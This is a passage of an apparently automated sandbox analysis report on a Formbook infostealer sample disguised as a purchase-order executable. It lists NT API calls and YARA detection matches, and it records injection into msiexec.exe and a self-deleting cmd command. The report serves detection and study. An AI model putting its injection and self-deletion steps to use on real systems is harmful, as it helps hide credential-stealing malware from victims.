          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012898F0 NtReadVirtualMemory,LdrInitializeThunk,10_2_012898F0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289A20 NtResumeThread,LdrInitializeThunk,10_2_01289A20
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289A00 NtProtectVirtualMemory,LdrInitializeThunk,10_2_01289A00
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289A50 NtCreateFile,LdrInitializeThunk,10_2_01289A50
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289540 NtReadFile,LdrInitializeThunk,10_2_01289540
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012895D0 NtClose,LdrInitializeThunk,10_2_012895D0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289710 NtQueryInformationToken,LdrInitializeThunk,10_2_01289710
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012897A0 NtUnmapViewOfSection,LdrInitializeThunk,10_2_012897A0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289780 NtMapViewOfSection,LdrInitializeThunk,10_2_01289780
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289FE0 NtCreateMutant,LdrInitializeThunk,10_2_01289FE0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_01289660
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012896E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_012896E0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289950 NtQueueApcThread,10_2_01289950
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012899D0 NtCreateProcessEx,10_2_012899D0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289820 NtEnumerateKey,10_2_01289820
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0128B040 NtSuspendThread,10_2_0128B040
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012898A0 NtWriteVirtualMemory,10_2_012898A0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289B00 NtSetValueKey,10_2_01289B00
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0128A3B0 NtGetContextThread,10_2_0128A3B0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289A10 NtQuerySection,10_2_01289A10
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289A80 NtOpenDirectoryObject,10_2_01289A80
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289520 NtWaitForSingleObject,10_2_01289520
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0128AD30 NtSetContextThread,10_2_0128AD30
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289560 NtWriteFile,10_2_01289560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04739860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739840 NtDelayExecution,LdrInitializeThunk,14_2_04739840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739540 NtReadFile,LdrInitializeThunk,14_2_04739540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04739910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047395D0 NtClose,LdrInitializeThunk,14_2_047395D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047399A0 NtCreateSection,LdrInitializeThunk,14_2_047399A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04739660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A50 NtCreateFile,LdrInitializeThunk,14_2_04739A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739650 NtQueryValueKey,LdrInitializeThunk,14_2_04739650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_047396E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047396D0 NtCreateKey,LdrInitializeThunk,14_2_047396D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739710 NtQueryInformationToken,LdrInitializeThunk,14_2_04739710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739FE0 NtCreateMutant,LdrInitializeThunk,14_2_04739FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739780 NtMapViewOfSection,LdrInitializeThunk,14_2_04739780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473B040 NtSuspendThread,14_2_0473B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739820 NtEnumerateKey,14_2_04739820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047398F0 NtReadVirtualMemory,14_2_047398F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047398A0 NtWriteVirtualMemory,14_2_047398A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739560 NtWriteFile,14_2_04739560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739950 NtQueueApcThread,14_2_04739950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473AD30 NtSetContextThread,14_2_0473AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739520 NtWaitForSingleObject,14_2_04739520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047395F0 NtQueryInformationFile,14_2_047395F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047399D0 NtCreateProcessEx,14_2_047399D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739670 NtQueryInformationProcess,14_2_04739670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A20 NtResumeThread,14_2_04739A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739610 NtEnumerateValueKey,14_2_04739610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A10 NtQuerySection,14_2_04739A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A00 NtProtectVirtualMemory,14_2_04739A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739A80 NtOpenDirectoryObject,14_2_04739A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739770 NtSetInformationFile,14_2_04739770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473A770 NtOpenThread,14_2_0473A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739760 NtOpenProcess,14_2_04739760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739730 NtQueryVirtualMemory,14_2_04739730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473A710 NtOpenProcessToken,14_2_0473A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04739B00 NtSetValueKey,14_2_04739B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0473A3B0 NtGetContextThread,14_2_0473A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047397A0 NtUnmapViewOfSection,14_2_047397A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597B90 NtCreateFile,14_2_00597B90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597C40 NtReadFile,14_2_00597C40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597CC0 NtClose,14_2_00597CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597D70 NtAllocateVirtualMemory,14_2_00597D70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597B8B NtCreateFile,14_2_00597B8B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597CBA NtReadFile,14_2_00597CBA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00597D6C NtAllocateVirtualMemory,14_2_00597D6C
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00861B900_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_0087B8E70_2_0087B8E7
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008780130_2_00878013
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008769020_2_00876902
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008781370_2_00878137
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00867BA60_2_00867BA6
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00869BA00_2_00869BA0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_008657C90_2_008657C9
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0040103010_2_00401030
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B9D010_2_0041B9D0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B1FD10_2_0041B1FD
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C18410_2_0041C184
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00408A3010_2_00408A30
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B49510_2_0041B495
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00402D9010_2_00402D90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C70310_2_0041C703
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041BF1410_2_0041BF14
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041B78510_2_0041B785
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00402FB010_2_00402FB0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087B8E710_2_0087B8E7
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087801310_2_00878013
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087690210_2_00876902
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087813710_2_00878137
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00861B9010_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00867BA610_2_00867BA6
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00869BA010_2_00869BA0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_008657C910_2_008657C9
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0126412010_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0124F90010_2_0124F900
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012699BF10_2_012699BF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0131E82410_2_0131E824
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0126A83010_2_0126A830
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0130100210_2_01301002
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012720A010_2_012720A0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013120A810_2_013120A8
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0125B09010_2_0125B090
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013128EC10_2_013128EC
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01312B2810_2_01312B28
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0126AB4010_2_0126AB40
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0127EBB010_2_0127EBB0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0130DBD210_2_0130DBD2
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013003DA10_2_013003DA
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012FFA2B10_2_012FFA2B
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_013122AE10_2_013122AE
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01240D2010_2_01240D20
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01312D0710_2_01312D07
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01311D5510_2_01311D55
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0127258110_2_01272581
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0125D5E010_2_0125D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0470841F14_2_0470841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047B100214_2_047B1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C28EC14_2_047C28EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047220A014_2_047220A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C20A814_2_047C20A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0470B09014_2_0470B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C1D5514_2_047C1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046F0D2014_2_046F0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0471412014_2_04714120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046FF90014_2_046FF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C2D0714_2_047C2D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0470D5E014_2_0470D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C25DD14_2_047C25DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0472258114_2_04722581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04716E3014_2_04716E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C2EF714_2_047C2EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C22AE14_2_047C22AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C2B2814_2_047C2B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047C1FF114_2_047C1FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_047BDBD214_2_047BDBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0472EBB014_2_0472EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C18414_2_0059C184
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00588A3014_2_00588A30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00582D9014_2_00582D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059BF1414_2_0059BF14
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00582FB014_2_00582FB0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: String function: 0124B150 appears 41 times
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: String function: 0086DF99 appears 54 times
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: String function: 00862D10 appears 94 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 046FB150 appears 35 times
          Source: PO#47974GH397.exe, 00000000.00000003.726994216.00000000007C6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO#47974GH397.exe
          Source: PO#47974GH397.exe, 0000000A.00000002.779294931.00000000014CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO#47974GH397.exe
          Source: PO#47974GH397.exe, 0000000A.00000002.778183836.00000000011BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs PO#47974GH397.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@10/6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
          Source: PO#47974GH397.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO#47974GH397.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO#47974GH397.exeReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO#47974GH397.exeFile read: C:\Users\user\Desktop\PO#47974GH397.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO#47974GH397.exe 'C:\Users\user\Desktop\PO#47974GH397.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\PO#47974GH397.exe C:\Users\user\Desktop\PO#47974GH397.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#47974GH397.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO#47974GH397.exeProcess created: C:\Users\user\Desktop\PO#47974GH397.exe C:\Users\user\Desktop\PO#47974GH397.exeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#47974GH397.exe'Jump to behavior
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PO#47974GH397.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO#47974GH397.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: PO#47974GH397.exe, 0000000A.00000002.778078911.00000000011B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000002.937959132.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: PO#47974GH397.exe, 0000000A.00000002.778078911.00000000011B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO#47974GH397.exe, 00000000.00000003.728838549.0000000002560000.00000004.00000001.sdmp, PO#47974GH397.exe, 0000000A.00000002.778206837.0000000001220000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000003.774600920.0000000000F70000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO#47974GH397.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000002.937959132.0000000005A00000.00000002.00000001.sdmp
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PO#47974GH397.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: PO#47974GH397.exeStatic PE information: real checksum: 0x334b6 should be: 0x5630e
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00862D56 push ecx; ret 0_2_00862D69
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C184 push dword ptr [2E33947Ah]; ret 10_2_0041C174
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C2FA push ecx; ret 10_2_0041C2FF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041C288 push CCFB6AF2h; ret 10_2_0041C2AB
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_004192B5 push eax; iretd 10_2_004192BF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00414CED push ecx; ret 10_2_00414CEE
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041AD55 push eax; ret 10_2_0041ADA8
